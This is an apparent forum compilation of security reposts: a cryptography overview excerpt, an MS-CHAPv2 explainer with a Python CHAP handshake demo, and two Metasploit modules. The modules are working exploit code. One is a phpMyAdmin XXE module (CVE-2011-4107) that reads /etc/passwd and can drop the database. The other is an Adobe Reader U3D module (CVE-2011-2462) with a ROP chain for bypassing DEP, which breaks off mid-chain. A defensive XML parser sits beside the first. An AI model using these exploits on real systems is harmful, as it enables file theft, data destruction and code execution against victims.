Vulture WebSSO 2.0.2 – vulture_2.0.2.tar.gz / vulture_2.0.2_amd64.deb / vulture-2.0.2-94.1.i386.rpm – Downloads - vulture - Open Source Reverse Proxy / Web Application Firewall - Google Project Hosting

Source: Vulture WebSSO version 2.0.2! — PenTestIT
-
[h=1]An Overview of Cryptography [/h][h=3]Gary C. Kessler 27 December 2011[/h] [h=4]A much shorter, edited version of this paper appears in the 1999 Edition of Handbook on Local Area Networks, published by Auerbach in September 1998. Since that time, this paper has taken on a life of its own...[/h] [h=3]CONTENTS[/h] 1. INTRODUCTION 2. THE PURPOSE OF CRYPTOGRAPHY 3. TYPES OF CRYPTOGRAPHIC ALGORITHMS 3.1. Secret Key Cryptography 3.2. Public-Key Cryptography 3.3. Hash Functions 3.4. Why Three Encryption Techniques? 3.5. The Significance of Key Length 4. TRUST MODELS 4.1. PGP Web of Trust 4.2. Kerberos 4.3. Public Key Certificates and Certification Authorities 4.4. Summary 5. CRYPTOGRAPHIC ALGORITHMS IN ACTION 5.1. Password Protection 5.2. Some of the Finer Details of Diffie-Hellman Key Exchange 5.3. Some of the Finer Details of RSA Public-Key Cryptography 5.4. Some of the Finer Details of DES, Breaking DES, and DES Variants 5.5. Pretty Good Privacy (PGP) 5.6. IP Security (IPsec) Protocol 5.7. The SSL "Family" of Secure Transaction Protocols for the World Wide Web 5.8. Elliptic Curve Cryptography 5.9. The Advanced Encryption Standard and Rijndael 5.10. Cisco's Stream Cipher 5.11. TrueCrypt 6. CONCLUSION... OF SORTS 7. REFERENCES AND FURTHER READING A. SOME MATH NOTES A.1. The Exclusive-OR (XOR) Function A.2. The modulo Function ABOUT THE AUTHOR [h=3]1. INTRODUCTION[/h] Does increased security provide comfort to paranoid people? Or does security provide some very basic protections that we are naive to believe that we don't need? During this time when the Internet provides essential communication between tens of millions of people and is being increasingly used as a tool for commerce, security becomes a tremendously important issue to deal with. There are many aspects to security and many applications, ranging from secure commerce and payments to private communications and protecting passwords. 
One essential aspect for secure communications is that of cryptography, which is the focus of this chapter. But it is important to note that while cryptography is necessary for secure communications, it is not by itself sufficient. The reader is advised, then, that the topics covered in this chapter only describe the first of many steps necessary for better security in any number of situations.

This paper has two major purposes. The first is to define some of the terms and concepts behind basic cryptographic methods, and to offer a way to compare the myriad cryptographic schemes in use today. The second is to provide some real examples of cryptography in use today.

I would like to say at the outset that this paper is very focused on terms, concepts, and schemes in current use and is not a treatise of the whole field. No mention is made here about pre-computerized crypto schemes, the difference between a substitution and transposition cipher, cryptanalysis, or other history. Interested readers should check out some of the books in the bibliography below for this detailed — and interesting! — background information.

[h=3]2. THE PURPOSE OF CRYPTOGRAPHY[/h]
Cryptography is the science of writing in secret code and is an ancient art; the first documented use of cryptography in writing dates back to circa 1900 B.C. when an Egyptian scribe used non-standard hieroglyphs in an inscription. Some experts argue that cryptography appeared spontaneously sometime after writing was invented, with applications ranging from diplomatic missives to war-time battle plans. It is no surprise, then, that new forms of cryptography came soon after the widespread development of computer communications. In data and telecommunications, cryptography is necessary when communicating over any untrusted medium, which includes just about any network, particularly the Internet.
Within the context of any application-to-application communication, there are some specific security requirements, including:
- Authentication: The process of proving one's identity. (The primary forms of host-to-host authentication on the Internet today are name-based or address-based, both of which are notoriously weak.)
- Privacy/confidentiality: Ensuring that no one can read the message except the intended receiver.
- Integrity: Assuring the receiver that the received message has not been altered in any way from the original.
- Non-repudiation: A mechanism to prove that the sender really sent this message.

Cryptography, then, not only protects data from theft or alteration, but can also be used for user authentication. There are, in general, three types of cryptographic schemes typically used to accomplish these goals: secret key (or symmetric) cryptography, public-key (or asymmetric) cryptography, and hash functions, each of which is described below. In all cases, the initial unencrypted data is referred to as plaintext. It is encrypted into ciphertext, which will in turn (usually) be decrypted into usable plaintext.

In many of the descriptions below, two communicating parties will be referred to as Alice and Bob; this is the common nomenclature in the crypto field and literature to make it easier to identify the communicating parties. If there is a third or fourth party to the communication, they will be referred to as Carol and Dave. Mallory is a malicious party, Eve is an eavesdropper, and Trent is a trusted third party.

Full tutorial: http://www.garykessler.net/library/crypto.html
-
MS-CHAP v2

MS-CHAP v2 is a one-way encrypted password, two-way authentication process that provides mutual authentication between peers (see Figure 1). It differs from MS-CHAP-V1 because it piggybacks an additional peer challenge (PCS) on the Response packet and an additional authenticator response on the Success packet. Both the authenticating server and the client challenge and authenticate each other. The message flow is as follows:

1. Authenticator sends a challenge consisting of a Session ID and random authenticator challenge string (ACS).
2. Client (peer) sends a response containing an encrypted one-way hash of the session ID, username, a peer challenge string (PCS), the peer response (PR), and the user password (secret).
3. Authenticator responds with another one-way hash (based on the client response) of a success/failure code, the authenticator response (AR), and the user's password (secret).
4. The peer verifies the authenticator response and begins communications if the response is successful. It disconnects on failure.

Figure 1: MS-CHAP-V2

This authentication method depends upon a secret (password) known only to the authenticator and the peer. The secret is not sent over the link. A one-way hash function, also known as a message digest, is a mathematical function that takes a variable-length input string and converts it into a fixed-length binary sequence that is computationally difficult to invert—that is, generate the original string from the hash.

[h=5]CHAP and MS-CHAP[/h]
CHAP was defined in RFC1994: PPP Challenge Handshake Authentication Protocol. CHAP (Challenge-Handshake Authentication Protocol) was initially used to verify client identity on PPP links using a three-way handshake. The handshake begins with the authenticator issuing a challenge to the client. The client responds with a digest calculated using a hashing function.
The authenticator then verifies the response and acknowledges the connection if the match is successful, otherwise it terminates the connection. CHAP depends upon a secret known only to the authenticator and the client. The secret is not sent over the link.

MS-CHAP differs from CHAP in that MS-CHAP does not require that the shared secret be stored in cleartext at both ends of the link. The Microsoft client knows the hash method used by the server so it can reproduce it, effectively creating a "matching" password on both ends. The client proves its identity based on the fact that it can reproduce the hashed value of the password.

[h=5]PAP[/h]
PAP (Password Authentication Protocol) is described in RFC1334. PAP provides a simple method for the peer to establish its identity using a two-way handshake. PAP is not a strong authentication method. Passwords are sent over the connection in cleartext and there is no protection from playback or repeated trial and error attacks.

[h=5]MD5[/h]
MD5 (Message-Digest algorithm 5) is a widely used cryptographic hash function that results in a 128-bit hash value. The 128-bit (16-byte) MD5 hashes (also termed message digests) typically are represented as 32-digit hexadecimal numbers (for example, ec55d3e698d289f2afd663725127bace). EAP-MD-5 typically is not recommended for wireless LAN implementations because it may expose the user's password, and because several collision-based weaknesses have been demonstrated. It provides for only one-way authentication—there is no mutual authentication of wireless client and the network. And very importantly it does not provide a means to derive dynamic, per-session wired equivalent privacy (WEP) keys.

[h=5]GTC[/h]
Typically, password (PIN) information is read by a user from a token card device and entered as ASCII text into the client. GTC is similar to PAP in that passwords are sent in the clear.
Notes from the Underground…—Dictionary Attacks

Passwords can be broken in real-time (active) and offline (passive) modes. The premise of a dictionary attack is that by trying every possible combination of words (or tokens), an attacker ultimately will succeed in discovering user secret passwords. A dictionary attack relies on the fact that a password is often a common word, name, or concatenation of words or names with a minor modification such as a trailing digit or two. Longer passwords with a variety of characters (such as ^Y2o4uEA16r3-2e64A12EFing!) offer the greatest protection against dictionary attacks.

During an online dictionary attack, an attacker tries to actively gain network access by trying many possible combinations of passwords for a specific user. Online dictionary attacks can be prevented using password lockout mechanisms that lock out the user account after a certain number of invalid login attempts. Online attacks also generally show up in logs, which can indicate that this type of "loud" hacking activity occurred or is occurring.

Offline attacks rely on the attacker's ability to capture and record data from the datastream, usually by using a sniffer such as tcpdump or ethereal. These captured data can then be compared at leisure against tables of hashes until a password is discovered or the attacker gives up. The offline attacks can be thwarted by changing passwords regularly and limiting attackers' access to the datastream.

Source: Centrex or PBX: MS-CHAPv2
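As an added illustration, not part of the quoted article, here is the RFC 1994 CHAP three-way handshake described above in Python (Response = MD5(Identifier || secret || Challenge)), together with the account-lockout mitigation the dictionary-attack notes mention and a check that a recorded response does not survive a fresh challenge. The MS-CHAPv2-specific NT-hash/DES response is not implemented; the usernames and secrets are constructed samples.

```python
import hashlib
import secrets

MAX_FAILURES = 3   # lockout threshold: the mitigation for online guessing


def chap_response(identifier, secret, challenge):
    """RFC 1994 CHAP: Response = MD5(Identifier || secret || Challenge).
    Only this digest crosses the link; the shared secret itself never does."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class Authenticator:
    """Server side of the handshake, with a per-user failure counter."""

    def __init__(self, shared_secrets):
        self.shared_secrets = shared_secrets   # username -> secret (bytes)
        self.failures = {}
        self.identifier = 0

    def challenge(self):
        # A fresh identifier and random challenge for every handshake: a recorded
        # response is only valid for the challenge it answered.
        self.identifier = (self.identifier + 1) & 0xFF
        return self.identifier, secrets.token_bytes(16)

    def verify(self, username, identifier, challenge, response):
        if self.failures.get(username, 0) >= MAX_FAILURES:
            return "LOCKED"                    # account locked, no more guessing
        secret = self.shared_secrets.get(username)
        if secret is not None:
            expected = chap_response(identifier, secret, challenge)
            if secrets.compare_digest(expected, response):
                self.failures[username] = 0
                return "SUCCESS"
        self.failures[username] = self.failures.get(username, 0) + 1
        return "FAILURE"


class Peer:
    """Client side: holds the secret and answers challenges."""

    def __init__(self, username, secret):
        self.username, self.secret = username, secret

    def respond(self, identifier, challenge):
        return chap_response(identifier, self.secret, challenge)


def handshake(auth, peer):
    """One CHAP exchange; returns (result, identifier, challenge, response)."""
    ident, chal = auth.challenge()                       # 1. Challenge
    resp = peer.respond(ident, chal)                     # 2. Response
    result = auth.verify(peer.username, ident, chal, resp)   # 3. Success/Failure
    return result, ident, chal, resp


def replay_attempt(auth, username, recorded_response):
    """An eavesdropper who captured a full exchange presents the old response
    to a new challenge; the identifier and challenge differ, so it fails."""
    new_ident, new_chal = auth.challenge()
    return auth.verify(username, new_ident, new_chal, recorded_response)


def online_guessing(auth, username, candidates):
    """Simulate repeated wrong guesses against one account to confirm the
    lockout triggers; returns the outcome of each attempt."""
    outcomes = []
    for guess in candidates:
        ident, chal = auth.challenge()
        outcomes.append(auth.verify(username, ident, chal,
                                    chap_response(ident, guess, chal)))
    return outcomes


if __name__ == "__main__":
    # Constructed sample credentials, not real ones.
    auth = Authenticator({"alice": b"correct horse battery staple"})
    result, ident, chal, resp = handshake(auth, Peer("alice", b"correct horse battery staple"))
    print("legitimate peer:", result)
    print("replayed response:", replay_attempt(auth, "alice", resp))
    print("wrong guesses:", online_guessing(auth, "alice", [b"password", b"123456", b"qwerty", b"letmein"]))
```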
-
[h=1]phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection[/h]

```ruby
# Exploit Title: poc-phpmyadmin-local-file-inclusion-via-xxe-injection
# Date: 12-01-2012
# Author: Marco Batista
# Blog Link: http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection/
# Tested on: Windows and Linux - phpmyadmin versions: 3.3.6, 3.3.10, 3.4.0, 3.4.5, 3.4.7
# CVE : CVE-2011-4107

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name' => 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection',
      'Version' => '1.0',
      'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server). The attacker must be logged in to MySQL via phpMyAdmin. Works on Windows and Linux Versions 3.3.X and 3.4.X},
      'References' =>
        [
          [ 'CVE', '2011-4107' ],
          [ 'OSVDB', '76798' ],
          [ 'BID', '50497' ],
          [ 'URL', 'http://secforce.com/research/'],
        ],
      'Author' => [ 'Marco Batista' ],
      'License' => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('FILE', [ true, "File to read", '/etc/passwd']),
        OptString.new('USER', [ true, "Username", 'root']),
        OptString.new('PASS', [ false, "Password", 'password']),
        OptString.new('DB', [ true, "Database to use/create", 'hddaccess']),
        OptString.new('TBL', [ true, "Table to use/create and read the file to", 'files']),
        OptString.new('APP', [ true, "Location for phpMyAdmin URL", '/phpmyadmin']),
        OptString.new('DROP', [ true, "Drop database after reading file?", 'true']),
      ], self.class)
  end

  def loginprocess
    # HTTP GET TO GET SESSION VALUES
    getresponse = send_request_cgi({
      'uri' => datastore['APP']+'/index.php',
      'method' => 'GET',
      'version' => '1.1',
    }, 25)

    if (getresponse.nil?)
      print_error("no response for #{ip}:#{rport}")
    elsif (getresponse.code == 200)
      print_status("Received #{getresponse.code} from #{rhost}:#{rport}")
    elsif (getresponse and getresponse.code == 302 or getresponse.code == 301)
      print_status("Received 302 to #{getresponse.headers['Location']}")
    else
      print_error("Received #{getresponse.code} from #{rhost}:#{rport}")
    end

    valuesget = getresponse.headers["Set-Cookie"]
    varsget = valuesget.split(" ")

    # GETTING THE VARIABLES NEEDED
    phpMyAdmin = varsget.grep(/phpMyAdmin/).last
    pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last
    # END HTTP GET

    # LOGIN POST REQUEST TO GET COOKIE VALUE
    postresponse = send_request_cgi({
      'uri' => datastore['APP']+'/index.php',
      'method' => 'POST',
      'version' => '1.1',
      'headers' =>{
        'Content-Type' => 'application/x-www-form-urlencoded',
        'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}"
      },
      'data' => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'
    }, 25)

    if (postresponse["Location"].nil?)
      print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")
      tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last
    else
      tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last
    end

    valuespost = postresponse.headers["Set-Cookie"]
    varspost = valuespost.split(" ")

    # GETTING THE VARIABLES NEEDED
    pmaUser = varspost.grep(/pmaUser-1/).last
    pmaPass = varspost.grep(/pmaPass-1/).last

    return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue
    # END OF LOGIN POST REQUEST

  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e
    print_error(e.message)
  rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
    print_error(e.message)
  end

  def readfile(cookie,tokenvalue)
    # READ FILE THROUGH EXPORT FUNCTION IN PHPMYADMIN
    getfiles = send_request_cgi({
      'uri' => datastore['APP']+'/export.php',
      'method' => 'POST',
      'version' => '1.1',
      'headers' =>{
        'Cookie' => cookie
      },
      'data' => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'
    }, 25)

    if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)
      print_error("Error reading the file... not enough privilege? login error?")
    else
      print_status("#{getfiles.body}")
    end
  end

  def dropdatabase(cookie,tokenvalue)
    dropdb = send_request_cgi({
      'uri' => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',
      'method' => 'GET',
      'version' => '1.1',
      'headers' =>{
        'Cookie' => cookie
      },
    }, 25)
    print_status("Dropping database: "+datastore['DB'])
  end

  def run
    cookie,tokenvalue = loginprocess()
    print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")

    craftedXML = "------WebKitFormBoundary3XPL01T\n"
    craftedXML << "Content-Disposition: form-data; name=\"token\"\n\n"
    craftedXML << tokenvalue+"\n"
    craftedXML << "------WebKitFormBoundary3XPL01T\n"
    craftedXML << "Content-Disposition: form-data; name=\"import_type\"\n\n"
    craftedXML << "server\n"
    craftedXML << "------WebKitFormBoundary3XPL01T\n"
    craftedXML << "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.xml\"\n"
    craftedXML << "Content-Type: text/xml\n\n"
    craftedXML << "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
    craftedXML << "<!DOCTYPE ficheiro [ \n"
    craftedXML << " <!ENTITY conteudo SYSTEM \"file:///#{datastore['FILE']}\" >]>\n"
    craftedXML << "<pma_xml_export version=\"1.0\" xmlns:pma=\"http://www.phpmyadmin.net/some_doc_url/\">\n"
    craftedXML << " <pma:structure_schemas>\n"
    craftedXML << " <pma:database name=\""+datastore['DB']+"\" collation=\"utf8_general_ci\" charset=\"utf8\">\n"
    craftedXML << " <pma:table name=\""+datastore['TBL']+"\">\n"
    craftedXML << " CREATE TABLE `"+datastore['TBL']+"` (`file` varchar(20000) NOT NULL);\n"
    craftedXML << " </pma:table>\n"
    craftedXML << " </pma:database>\n"
    craftedXML << " </pma:structure_schemas>\n"
    craftedXML << " <database name=\""+datastore['DB']+"\">\n"
    craftedXML << " <table name=\""+datastore['TBL']+"\">\n"
    craftedXML << " <column name=\"file\">&conteudo;</column>\n"
    craftedXML << " </table>\n"
    craftedXML << " </database>\n"
    craftedXML << "</pma_xml_export>\n\n"
    craftedXML << "------WebKitFormBoundary3XPL01T\n"
    craftedXML << "Content-Disposition: form-data; name=\"format\"\n\n"
    craftedXML << "xml\n"
    craftedXML << "------WebKitFormBoundary3XPL01T\n"
    craftedXML << "Content-Disposition: form-data; name=\"csv_terminated\"\n\n"
    craftedXML << ",\n\n"
    craftedXML << "------WebKitFormBoundary3XPL01T--"

    print_status("Grabbing that #{datastore['FILE']} you want...")
    res = send_request_cgi({
      'uri' => datastore['APP']+'/import.php',
      'method' => 'POST',
      'version' => '1.1',
      'headers' =>{
        'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T',
        'Cookie' => cookie
      },
      'data' => craftedXML
    }, 25)

    readfile(cookie,tokenvalue)

    if (datastore['DROP'] == "true")
      dropdatabase(cookie,tokenvalue)
    else
      print_status("Database was not dropped: "+datastore['DB'])
    end
  end
end
```

Source: phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection
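The defensive counterpart to the module above, as an added example that is not phpMyAdmin's code or fix: an import parser for the same `<database>/<table>/<column>` document layout that refuses a DOCTYPE, any entity declaration, and any external entity reference before a value can be dereferenced. Both sample documents are constructed here; the SYSTEM identifier in the second is a placeholder.

```python
import xml.parsers.expat as expat


class XmlImportRejected(ValueError):
    """The document carries a DTD or entity declaration, the XXE vector."""


def parse_pma_import(xml_bytes):
    """Parse a phpMyAdmin-style XML import and return {table: [column text, ...]}
    for the data section, refusing DTDs outright: a data import never needs one."""
    parser = expat.ParserCreate()
    rows = {}
    state = {"table": None, "text": None}

    # Hardening hooks: fail as early as possible, before any entity can be
    # defined, let alone resolved.
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise XmlImportRejected("DOCTYPE '%s' is not allowed in an import" % name)

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise XmlImportRejected("entity '%s' declared (SYSTEM %r)" % (name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        raise XmlImportRejected("external entity reference to %r" % sysid)

    # Ordinary data extraction for the <table>/<column> elements.
    def on_start(tag, attrs):
        if tag == "table":
            state["table"] = attrs.get("name", "")
            rows.setdefault(state["table"], [])
        elif tag == "column" and state["table"] is not None:
            state["text"] = []

    def on_text(data):
        if state["text"] is not None:
            state["text"].append(data)

    def on_end(tag):
        if tag == "column" and state["text"] is not None:
            rows[state["table"]].append("".join(state["text"]))
            state["text"] = None
        elif tag == "table":
            state["table"] = None

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_text
    parser.EndElementHandler = on_end
    parser.Parse(xml_bytes, True)
    return rows


def is_safe_import(xml_bytes):
    """True when the document parses without tripping the XXE guard."""
    try:
        parse_pma_import(xml_bytes)
        return True
    except XmlImportRejected:
        return False


# Constructed sample: the plain export layout with a literal value.
BENIGN_IMPORT = b"""<?xml version="1.0" encoding="utf-8"?>
<pma_xml_export version="1.0" xmlns:pma="http://www.phpmyadmin.net/some_doc_url/">
  <database name="hddaccess">
    <table name="files">
      <column name="file">hello world</column>
    </table>
  </database>
</pma_xml_export>
"""

# Constructed sample: same layout with the internal DTD the module relies on;
# the SYSTEM path is a placeholder, not a real target.
XXE_IMPORT = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE ficheiro [
  <!ENTITY conteudo SYSTEM "file:///PLACEHOLDER/local/file">
]>
<pma_xml_export version="1.0" xmlns:pma="http://www.phpmyadmin.net/some_doc_url/">
  <database name="hddaccess">
    <table name="files">
      <column name="file">&conteudo;</column>
    </table>
  </database>
</pma_xml_export>
"""

if __name__ == "__main__":
    print("benign:", parse_pma_import(BENIGN_IMPORT))
    print("XXE sample accepted?", is_safe_import(XXE_IMPORT))
```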
-
[h=1]Adobe Reader U3D Memory Corruption Vulnerability[/h]

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'zlib'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Adobe Reader U3D Memory Corruption Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability in the U3D handling within versions 9.x
        through 9.4.6 and 10 through to 10.1.1 of Adobe Reader. The vulnerability is
        due to the use of uninitialized memory. Arbitrary code execution is achieved by
        embedding specially crafted U3D data into a PDF document. A heap spray via
        JavaScript is used in order to ensure that the memory used by the invalid pointer
        issue is controlled.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'sinn3r',
          'juan vazquez',
          'jduck'
        ],
      'References'     =>
        [
          [ 'CVE', '2011-2462' ],
          [ 'OSVDB', '77529' ],
          [ 'BID', '50922' ],
          [ 'URL', 'http://www.adobe.com/support/security/advisories/apsa11-04.html' ],
          [ 'URL', 'http://blog.vulnhunt.com/index.php/2011/12/12/cve-2011-2462-pdf-0day-analysis/' ],
          [ 'URL', 'http://blog.9bplus.com/analyzing-cve-2011-2462' ],
          [ 'URL', 'http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => 'true',
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            # Adobe Reader 9.4.0 / XP SP3
            # Adobe Reader 9.4.5 / XP SP3
            # Adobe Reader 9.4.6 / XP SP3
            'Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3',
            {
              # gadget from icucnv36:
              # mov ecx,dword ptr [eax+3Ch]
              # mov eax,dword ptr [ecx]
              # call dword ptr [eax+1Ch]
              'Ret' => 0x4a8453c3
            }
          ],
        ],
      'DisclosureDate' => 'Dec 06 2011', #Needs to be checked
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
  end

  def junk(n=1)
    tmp = []
    value = rand_text(4).unpack("L")[0].to_i
    n.times { tmp << value }
    return tmp
  end

  def exploit
    # DEP bypass; uses icucnv36.dll
    stack_data = [
      junk,
      0x0c0c0c0c, # mapped at 0x0c0c0c0c
                  # becomes edi after stackpivot
      0x0c0c0c0c, # becomes esi
      0x4a806f29, # pop edi / pop esi / pop ebp / ret 14h
      0x4a8a0000, # becomes edi
      0x4a802196, # becomes esi
      0x4a801f90, # becomes ebp
      0x4a806f29, # pop edi / pop esi / pop ebp / ret 14h
      0x4a806cef, # Stackpivot! xchg eax,esp (eax=0x0c0c0c0c) / xor al, al / pop edi / pop esi / ret
      # padding
      junk(4),
      0x00000000, # becomes edi
      0x00000002, # becomes esi
      0x00000102, # becomes ebp
      0x4a806f29, # pop edi / pop esi / pop ebp / ret 14h
      junk(5),
      0x4a80a8a6, # becomes edi
      0x4a801f90, # becomes esi
      0x4a849038, # becomes ebp
      0x4a8063a5, # pop ecx / ret
      junk(5),
      0x4a8a0000, # becomes ecx
      0x4a802196, # mov dword ptr [ecx],eax / ret # Stores eax (stack address)
      0x4a801f90, # pop eax / ret
      0x4a84903c, # becomes eax (import for CreateFileA)
      0x4a80b692, # jmp dword ptr [eax] {kernel32!CreateFileA}
      0x4a801064, # ret for CreateFileA # ret
      0x00000000, # __in LPCTSTR lpFileName
      0x10000000, # __in DWORD dwDesiredAccess
      0x00000000, # __in DWORD dwShareMode
      0x00000000, # __in_opt LPSECURITY_ATTRIBUTES lpSecurityAttributes
      0x00000002, # __in DWORD dwCreationDisposition
      0x00000102, # __in DWORD dwFlagsAndAttributes
      0x00000000, # __in_opt HANDLE hTemplateFile
      0x4a8063a5, # pop ecx / ret
      0x4a801064, # becomes ecx
      0x4a842db2, # xchg eax, edi / ret
      0x4a802ab1, # pop ebx / ret
      0x00000008, # becomes ebx
      0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0x0c0c0ce0, edi = {Result of CreateFileA}) / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
      0x4a801f90, # pop eax / ret
      0x4a849038, # becomes eax (import for CreateFileA)
      0x4a80b692, # jmp dword ptr [eax] {kernel32!CreateFileMappingA}
      0x4a801064, # ret for CreateFileMappingA # ret
      0xffffffff, # __in HANDLE hFile # mapped at 0c0c0ce0 => Stores Result of CreateFileA
      0x00000000, # __in_opt LPSECURITY_ATTRIBUTES lpAttributes,
      0x00000040, # __in DWORD flProtect,
      0x00000000, # __in DWORD dwMaximumSizeHigh,
      0x00010000, # __in DWORD dwMaximumSizeLow,
      0x00000000, # __in_opt LPCTSTR lpName
      0x4a8063a5, # pop ecx / ret
      0x4a801064, # becomes ecx
      0x4a842db2, # xchg eax, edi / ret
      0x4a802ab1, # pop ebx / ret
      0x00000008, # becomes ebx
      0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0x0c0c0d20, edi = {Result of FileMappingA}) / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
      0x4a801f90, # pop eax / ret
      0x4a849030, # becomes eax (import for kernel32!MapViewOfFile)
      0x4a80b692, # jmp dword ptr [eax] {kernel32!MapViewOfFile}
      0x4a801064, # ret for MapViewOfFile # ret
      0xffffffff, # __in HANDLE hFileMappingObject # mapped at 0x0c0c0d20 => {Result of FileMappingA}
      0x00000022, # __in DWORD dwDesiredAccess
      0x00000000, # __in DWORD dwFileOffsetHigh
      0x00000000, # __in DWORD dwFileOffsetLow
      0x00010000, # __in SIZE_T dwNumberOfBytesToMap
      0x4a8063a5, # pop ecx / ret
      0x4a8a0004, # becomes ecx
      0x4a802196, # mov dword ptr [ecx],eax / ret # Stores result of MapViewOfFile
      0x4a8063a5, # pop ecx / ret
      0x4a801064, # becomes ecx
      0x4a842db2, # xchg eax, edi / ret
      0x4a802ab1, # pop ebx / ret
      0x00000030, # becomes ebx
      0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0c0c0db8, edi = {Result of MapViewOfFile} / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
      0x4a801f90, # pop eax / ret
      0x4a8a0004, # becomes eax {Result of MapViewOfFile}
      0x4a80a7d8, # mov eax,dword ptr [eax] / ret
      0x4a8063a5, # pop ecx / ret
      0x4a801064, # becomes ecx
      0x4a842db2, # xchg eax, edi / ret
      0x4a802ab1, # pop ebx / ret
      0x00000020, # becomes ebx
      0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0c0c0dbc, edi = {Result of MapViewOfFile} / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
      0x4a8063a5, # pop ecx / ret
      0x4a801064, # becomes ecx
      0x4a80aedc, # lea edx,[esp+0Ch] (edx => 0c0c0d94) / push edx {0c0c0d94} / push eax {Result of MapViewOfFile} / push dword ptr [esp+0Ch] ([0c0c0d8c] => 0x34) / push dword ptr [4a8a093c] ([4a8a093c] = 0x0) / call ecx (u 0x4a801064 => ret) / add esp, 10h / ret
      0x4a801f90, # pop eax / ret
      0x00000034, # becomes eax # mapped at 0c0c0d8c
      0x4a80d585, # add eax, edx / ret (eax => 0c0c0dc8 => shellcode after ROP chain)
      0x4a8063a5, # pop ecx / ret # mapped at 0c0c0d94
      0x4a801064, # becomes ecx
      0x4a842db2, # xchg eax,edi (edi becomes 0c0c0d8c, eax becomes Result of MapViewOfFile) / ret
      0x4a802ab1, # pop ebx / ret
      0x0000000a, # becomes ebx
      0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0c0c0dc0, edi = {shellcode after ROP chain} / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
